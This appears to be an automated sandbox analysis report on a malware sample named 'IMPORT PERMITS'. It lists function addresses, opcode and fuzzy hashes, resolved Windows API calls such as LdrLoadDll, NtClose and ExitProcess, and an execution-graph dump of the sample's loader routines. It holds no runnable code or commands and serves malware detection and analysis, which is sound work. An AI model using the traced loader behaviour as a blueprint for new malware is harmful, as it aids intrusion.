                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: b5e194a9c9ec8a29d4da063d5fa0435fc27a28d56efdd6b0a5983335fbcbc3f1
                                                                                                                                • Instruction ID: 518672f4b11162ed9a8d3969be212da0db4131cb3302546abfef9da8bf1445ed
                                                                                                                                • Opcode Fuzzy Hash: b5e194a9c9ec8a29d4da063d5fa0435fc27a28d56efdd6b0a5983335fbcbc3f1
                                                                                                                                • Instruction Fuzzy Hash: EB1156719002498FCB10DFAAC844ADEBFF5EF88320F208419E519A7250C775A940CFA0
                                                                                                                                Function 029324F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ResumeThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 947044025-0
                                                                                                                                • Opcode ID: 1a8c39991f1049115a6abb89754519ab7a6f42db5d8c5b6c56bc2a5b242cbb4d
                                                                                                                                • Instruction ID: eb0cb1762b47fa4891590a7735662764f84b6a572e86607577792e5510525c06
                                                                                                                                • Opcode Fuzzy Hash: 1a8c39991f1049115a6abb89754519ab7a6f42db5d8c5b6c56bc2a5b242cbb4d
                                                                                                                                • Instruction Fuzzy Hash: 231158B1D002498FDB10DFADC5457DEFBF5AF88324F208419D419A7250C775A944CF94
                                                                                                                                Function 029324F8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ResumeThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 947044025-0
                                                                                                                                • Opcode ID: eba1dc8b76d96acab3eb1bd3b2232440da5c1fe1e21dfb59abeeccb7a01dc155
                                                                                                                                • Instruction ID: d2f4b33d6266fcf7a23d0379e3905050113fe951876b56a8a06960b044136531
                                                                                                                                • Opcode Fuzzy Hash: eba1dc8b76d96acab3eb1bd3b2232440da5c1fe1e21dfb59abeeccb7a01dc155
                                                                                                                                • Instruction Fuzzy Hash: 0A1125B1D002498FDB20DFAAC8457DEFBF5AB88324F208429D459A7250CB75A944CFA4
                                                                                                                                Function 02931188 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0293517D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePost
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 410705778-0
                                                                                                                                • Opcode ID: 724e281c1cb51fcdb725f676db0c5f46b1d2956f5083cdafeb49f4f9e22aadbd
                                                                                                                                • Instruction ID: 5efda221af23b2c26577b0124dd5c60f7be502c4174e34b0dffbb94f9a6a0278
                                                                                                                                • Opcode Fuzzy Hash: 724e281c1cb51fcdb725f676db0c5f46b1d2956f5083cdafeb49f4f9e22aadbd
                                                                                                                                • Instruction Fuzzy Hash: 061122B59003489FDB10DF9AC884BDEBBF8EB48324F108459E958A7210C374A944CFA1
                                                                                                                                Function 0104B218 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0104B27E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: 42158bc40583db7da646cd201ea8bc4a51a59c7df5c1fa1c5105e833a048a664
                                                                                                                                • Instruction ID: b5d5a4c0e56db6b7d0a1b3d1123cb1def1f83fd4c7e22b48a671e1e77ce5c1f3
                                                                                                                                • Opcode Fuzzy Hash: 42158bc40583db7da646cd201ea8bc4a51a59c7df5c1fa1c5105e833a048a664
                                                                                                                                • Instruction Fuzzy Hash: 3C1110B5D003498FDB10CF9AC984ADEFBF4EF88324F10846AD468A7210C379A545CFA1
                                                                                                                                Function 02935118 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0293517D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePost
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 410705778-0
                                                                                                                                • Opcode ID: 9c8e6ba6a986624293718d2117e66c7ca7972a2e28c03d493676797600f11936
                                                                                                                                • Instruction ID: b898ad196b78028b9808e93902f17be0c943d77aadf82267212285fbc4910215
                                                                                                                                • Opcode Fuzzy Hash: 9c8e6ba6a986624293718d2117e66c7ca7972a2e28c03d493676797600f11936
                                                                                                                                • Instruction Fuzzy Hash: 331103B5900349CFDB10DF99D985BDEFBF4EB48320F14845AD458A7610C378A984CFA0
                                                                                                                                Function 00C9D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1750608793.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_c9d000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dbfad5f564a9b39ce39b97aa77b911773a55c4bb73f072a6fe4b2a805a425c2c
                                                                                                                                • Instruction ID: 750eebbe4c38566bae94a8da0a5159724078b91378f1d74524d2f06ec22afdd2
                                                                                                                                • Opcode Fuzzy Hash: dbfad5f564a9b39ce39b97aa77b911773a55c4bb73f072a6fe4b2a805a425c2c
                                                                                                                                • Instruction Fuzzy Hash: DF212871500204DFDF05DF14D9C8B26BF65FB94314F20C169E90A5B256C336E856CAA2
                                                                                                                                Function 00CAD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1752182862.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_cad000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a8393099674c49fb96a41f8784a5ccef1aa30554b99bead597d4100bc0bd9717
                                                                                                                                • Instruction ID: 56733ca087c5bc225860a6b21fbba5bffba9d26a8b55264f6c3aa5e1912d0bd7
                                                                                                                                • Opcode Fuzzy Hash: a8393099674c49fb96a41f8784a5ccef1aa30554b99bead597d4100bc0bd9717
                                                                                                                                • Instruction Fuzzy Hash: C8210471604205DFCB14DF24D9C4B26BFA5FB89318F20C56DE84B4B696C33AD847CA61
                                                                                                                                Function 00CAD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1752182862.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_cad000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 79b948d4b545a92f1e52e9811a960032c207a2cc59fce1749b1a007e69f3cfb6
                                                                                                                                • Instruction ID: 534f257ce38c7e292d58b22553659ce40f3ae58202cb340c4ed35e127e3e13a4
                                                                                                                                • Opcode Fuzzy Hash: 79b948d4b545a92f1e52e9811a960032c207a2cc59fce1749b1a007e69f3cfb6
                                                                                                                                • Instruction Fuzzy Hash: B0212671504205EFDB05DF14DAC4B2ABBA5FB85318F20C6BDE90B4B696C33ADC46CA61
                                                                                                                                Function 00CAD005 Relevance: .1, Instructions: 62COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1752182862.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_cad000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b2df24d6a3c71b0c7a2816efabcf6ff5d07f18e2156047a8e5bd0f159139eba3
                                                                                                                                • Instruction ID: 2ccfcf7784d3deccbb47de03c7fbbb030f8cec2ab394e471c542e5530f887bd8
                                                                                                                                • Opcode Fuzzy Hash: b2df24d6a3c71b0c7a2816efabcf6ff5d07f18e2156047a8e5bd0f159139eba3
                                                                                                                                • Instruction Fuzzy Hash: 382153755093808FDB12CF24D594715BF71EB46318F28C5DAD84A8F6A7C33A990ACB62
                                                                                                                                Function 00C9D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1750608793.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_c9d000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                • Instruction ID: 65a2e48663c3a310bb65df39903668c17114a8636eeeed06f782801e7134a14c
                                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                • Instruction Fuzzy Hash: C8110372404240CFCF02CF00D5C4B16BF71FB94324F24C2A9D80A1B256C33AE95ACBA1
                                                                                                                                Function 00CAD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1752182862.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_cad000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                • Instruction ID: 1dda229f5ca37f94173b53c16887a253354207050fe3722bece9ecb5e7eaed9d
                                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                • Instruction Fuzzy Hash: CA11BB75504284DFCB02CF10C5C4B15BBA1FB85318F24C6AAD84A4B6A6C33AD84ACB61

                                                                                                                                Non-executed Functions

                                                                                                                                Function 02931C80 Relevance: .3, Instructions: 312COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: de7df42e2b63ce190c402cf17d549464bc472d0624e041c72cdb5e346b23a119
                                                                                                                                • Instruction ID: 4cb1b6d5b6674824f12cbe3d896dcca9dc767126b086c0bcea03c05d0d08c885
                                                                                                                                • Opcode Fuzzy Hash: de7df42e2b63ce190c402cf17d549464bc472d0624e041c72cdb5e346b23a119
                                                                                                                                • Instruction Fuzzy Hash: A9E1E674E041198FDB14DFA9C5809AEFBF2FF89304F248169E819AB35AD731A941CF61
                                                                                                                                Function 02930040 Relevance: .3, Instructions: 312COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d963d5ceda698730bfab525febd08f567b42a5048f2670ca5b5827d4588c85ac
                                                                                                                                • Instruction ID: 00a65496f1d9916474459b435d15c65f1e0d1a4058966ec34f8c090054386a6c
                                                                                                                                • Opcode Fuzzy Hash: d963d5ceda698730bfab525febd08f567b42a5048f2670ca5b5827d4588c85ac
                                                                                                                                • Instruction Fuzzy Hash: 45E1E874E041198FDB14DFA9C580AAEFBF2BF89304F24D169E418AB356DB31A941CF61
                                                                                                                                Function 02930478 Relevance: .3, Instructions: 312COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e7bbcfefa3e1a15b25a1b8df211beef7fefb9b394088773690a7491f39b8ebca
                                                                                                                                • Instruction ID: be290fe19c77e464866a7fa672965f4b7566d5be81cd3b1b896816d6b32766cd
                                                                                                                                • Opcode Fuzzy Hash: e7bbcfefa3e1a15b25a1b8df211beef7fefb9b394088773690a7491f39b8ebca
                                                                                                                                • Instruction Fuzzy Hash: 37E1F974E041198FDB14DFA9C9809AEFBF2FF89304F248169E415AB35AD731A941CFA1
                                                                                                                                Function 029325A8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8b8598ad6811f7cde8a5b46901e097064ce238f4205152edad851c568480538e
                                                                                                                                • Instruction ID: 269c8478e13c9a7028c6c5d16ff21d54f64d2cad8f26b597dd13732ae0c38c34
                                                                                                                                • Opcode Fuzzy Hash: 8b8598ad6811f7cde8a5b46901e097064ce238f4205152edad851c568480538e
                                                                                                                                • Instruction Fuzzy Hash: 99E1E774E042198FDB15DFA9C5809AEFBF2BF89304F248169E815AB356D730AD41CFA1
                                                                                                                                Function 0104D684 Relevance: .3, Instructions: 264COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f424e2670205782a233c9fe68f773613ad61b464de47b4d1a638a26779073bf8
                                                                                                                                • Instruction ID: cce98c1d3d94cb721fb2fbd64cf39e252ad1c4b9e966257836c99c42d119e681
                                                                                                                                • Opcode Fuzzy Hash: f424e2670205782a233c9fe68f773613ad61b464de47b4d1a638a26779073bf8
                                                                                                                                • Instruction Fuzzy Hash: 89A16DB2E002168FCF15DFB9C5804DEBBB2FF85300B2585BAE941AB265DB75E915CB40
                                                                                                                                Function 02930006 Relevance: .2, Instructions: 152COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 386d45fb3ddb4e531ba78ec2d34d30bdacefe0d0cf69dd756b1da226522abd09
                                                                                                                                • Instruction ID: 0cc34caf82de2d4c5b40322b948090fac7350d90cd4b5a5a4b87dc146c3ffffb
                                                                                                                                • Opcode Fuzzy Hash: 386d45fb3ddb4e531ba78ec2d34d30bdacefe0d0cf69dd756b1da226522abd09
                                                                                                                                • Instruction Fuzzy Hash: 61516074E042598FCB05CFA9C9805AEFBF2FF89304F2481AAD418AB356D7309946CF61

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:1.2%
                                                                                                                                Dynamic/Decrypted Code Coverage:5%
                                                                                                                                Signature Coverage:9.4%
                                                                                                                                Total number of Nodes:139
                                                                                                                                Total number of Limit Nodes:9
                                                                                                                                execution_graph 93180 42b903 93181 42b920 93180->93181 93184 1422df0 LdrInitializeThunk 93181->93184 93182 42b948 93184->93182 93185 424703 93186 42471f 93185->93186 93187 424747 93186->93187 93188 42475b 93186->93188 93189 42c343 NtClose 93187->93189 93195 42c343 93188->93195 93191 424750 93189->93191 93192 424764 93198 42e543 RtlAllocateHeap 93192->93198 93194 42476f 93196 42c360 93195->93196 93197 42c371 NtClose 93196->93197 93197->93192 93198->93194 93199 42f4c3 93200 42f4d3 93199->93200 93201 42f4d9 93199->93201 93204 42e503 93201->93204 93203 42f4ff 93207 42c683 93204->93207 93206 42e51e 93206->93203 93208 42c6a0 93207->93208 93209 42c6b1 RtlAllocateHeap 93208->93209 93209->93206 93248 424a93 93253 424aac 93248->93253 93249 424b39 93250 424af4 93251 42e423 RtlFreeHeap 93250->93251 93252 424b04 93251->93252 93253->93249 93253->93250 93254 424b34 93253->93254 93255 42e423 RtlFreeHeap 93254->93255 93255->93249 93210 1422b60 LdrInitializeThunk 93211 41e223 93212 41e249 93211->93212 93216 41e343 93212->93216 93217 42f5f3 93212->93217 93214 41e2e4 93214->93216 93223 42b953 93214->93223 93218 42f563 93217->93218 93219 42f5c0 93218->93219 93220 42e503 RtlAllocateHeap 93218->93220 93219->93214 93221 42f59d 93220->93221 93227 42e423 93221->93227 93224 42b96d 93223->93224 93233 1422c0a 93224->93233 93225 42b999 93225->93216 93230 42c6d3 93227->93230 93229 42e43c 93229->93219 93231 42c6f0 93230->93231 93232 42c701 RtlFreeHeap 93231->93232 93232->93229 93234 1422c11 93233->93234 93235 1422c1f LdrInitializeThunk 93233->93235 93234->93225 93235->93225 93256 41b013 93257 41b057 93256->93257 93258 41b078 93257->93258 93259 42c343 NtClose 93257->93259 93259->93258 93260 413dd3 93261 413de0 93260->93261 93266 417513 93261->93266 93263 413e0b 93264 413e50 93263->93264 93265 413e3f PostThreadMessageW 93263->93265 93265->93264 93267 417537 93266->93267 93268 41753e 93267->93268 93269 41755d 93267->93269 93273 42f8a3 LdrLoadDll 93267->93273 93268->93263 93271 417573 LdrLoadDll 93269->93271 93272 41758a 93269->93272 93271->93272 93272->93263 93273->93269 93274 401af6 93275 401b00 93274->93275 93278 42f993 93275->93278 93276 401c55 93276->93276 93281 42dff3 93278->93281 93282 42e016 93281->93282 93293 4074b3 93282->93293 93284 42e02c 93285 42e088 93284->93285 93296 41ae23 93284->93296 93285->93276 93287 42e04b 93288 42e060 93287->93288 93311 42c723 93287->93311 93307 427fd3 93288->93307 93291 42e07a 93292 42c723 ExitProcess 93291->93292 93292->93285 93295 4074c0 93293->93295 93314 416233 93293->93314 93295->93284 93297 41ae4f 93296->93297 93325 41ad13 93297->93325 93300 41ae94 93303 41aeb0 93300->93303 93305 42c343 NtClose 93300->93305 93301 41ae7c 93302 41ae87 93301->93302 93304 42c343 NtClose 93301->93304 93302->93287 93303->93287 93304->93302 93306 41aea6 93305->93306 93306->93287 93308 428035 93307->93308 93310 428042 93308->93310 93336 418383 93308->93336 93310->93291 93312 42c740 93311->93312 93313 42c751 ExitProcess 93312->93313 93313->93288 93315 416250 93314->93315 93317 416269 93315->93317 93318 42cdc3 93315->93318 93317->93295 93319 42cddd 93318->93319 93320 42ce0c 93319->93320 93321 42b953 LdrInitializeThunk 93319->93321 93320->93317 93322 42ce6c 93321->93322 93323 42e423 RtlFreeHeap 93322->93323 93324 42ce85 93323->93324 93324->93317 93326 41ae09 93325->93326 93327 41ad2d 93325->93327 93326->93300 93326->93301 93331 42b9f3 93327->93331 93330 42c343 NtClose 93330->93326 93332 42ba0d 93331->93332 93335 14235c0 LdrInitializeThunk 93332->93335 93333 41adfd 93333->93330 93335->93333 93337 4183ad 93336->93337 93338 4188ab 93337->93338 93344 413a53 93337->93344 93338->93310 93340 4184ce 93340->93338 93341 42e423 RtlFreeHeap 93340->93341 93342 4184e6 93341->93342 93342->93338 93343 42c723 ExitProcess 93342->93343 93343->93338 93348 413a73 93344->93348 93346 413adc 93346->93340 93347 413ad2 93347->93340 93348->93346 93349 41b133 RtlFreeHeap LdrInitializeThunk 93348->93349 93349->93347 93236 4138e6 93238 413872 93236->93238 93238->93236 93239 413895 93238->93239 93240 42c5e3 93238->93240 93241 42c5fd 93240->93241 93244 1422c70 LdrInitializeThunk 93241->93244 93242 42c625 93242->93239 93244->93242 93245 418ac8 93246 42c343 NtClose 93245->93246 93247 418ad2 93246->93247

                                                                                                                                Executed Functions

                                                                                                                                Function 00417513 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 400 417513-41752f 401 417537-41753c 400->401 402 417532 call 42f003 400->402 403 417542-417550 call 42f603 401->403 404 41753e-417541 401->404 402->401 407 417560-417571 call 42dac3 403->407 408 417552-417557 403->408 413 417573-417587 LdrLoadDll 407->413 414 41758a-41758d 407->414 409 41755d 408->409 410 417558 call 42f8a3 408->410 409->407 410->409 413->414
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: 5b7e103240ded1459ada72a1c913c8d9925025acccbb9aa8914370982d61623b
                                                                                                                                • Instruction ID: 83a4faa08aeb9e0cc7d1d2cc38f7fda52d0d200c19248de9a3f1e8e19a1a9c74
                                                                                                                                • Opcode Fuzzy Hash: 5b7e103240ded1459ada72a1c913c8d9925025acccbb9aa8914370982d61623b
                                                                                                                                • Instruction Fuzzy Hash: AD015EB1E4420DBBDB10DBE1DC42FDEB378AB54308F4041AAE90897241F635EB488B95
                                                                                                                                Function 0042C343 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C37A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                • Opcode ID: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                                • Instruction ID: 81410ffb0874c72c9f82fd140613efc6d021da64afe04e32bc0b3bf2b0fa7c57
                                                                                                                                • Opcode Fuzzy Hash: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                                • Instruction Fuzzy Hash: 16E04F362102147BD510FA5ADC01F9B779CEFC5714F40841AFA0967141C674B90287B5
                                                                                                                                Function 01422B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 6bcd4f83b35e9215b5805ec580c2bef7149d1647b22f139d684cd714fc8af498
                                                                                                                                • Instruction ID: 380677072ded86e938762bdc90c522b65d5e03485e6c873502698c72ce6e7809
                                                                                                                                • Opcode Fuzzy Hash: 6bcd4f83b35e9215b5805ec580c2bef7149d1647b22f139d684cd714fc8af498
                                                                                                                                • Instruction Fuzzy Hash: 3890026120240103410571584414616801A97F4201B55C122F1018591DC63589927225
                                                                                                                                Function 01422DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 313a643b4c42a28d6e06bf89c0727852f810f27002c42073be410b2d913571a4
                                                                                                                                • Instruction ID: bd67403fd2a9d8978e2d513cbd646b4da8cf7a7493590f644cfc29f5637ae1cf
                                                                                                                                • Opcode Fuzzy Hash: 313a643b4c42a28d6e06bf89c0727852f810f27002c42073be410b2d913571a4
                                                                                                                                • Instruction Fuzzy Hash: C990023120140513D11171584504707401997E4241F95C513B0428559DD7668A53B221
                                                                                                                                Function 01422C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
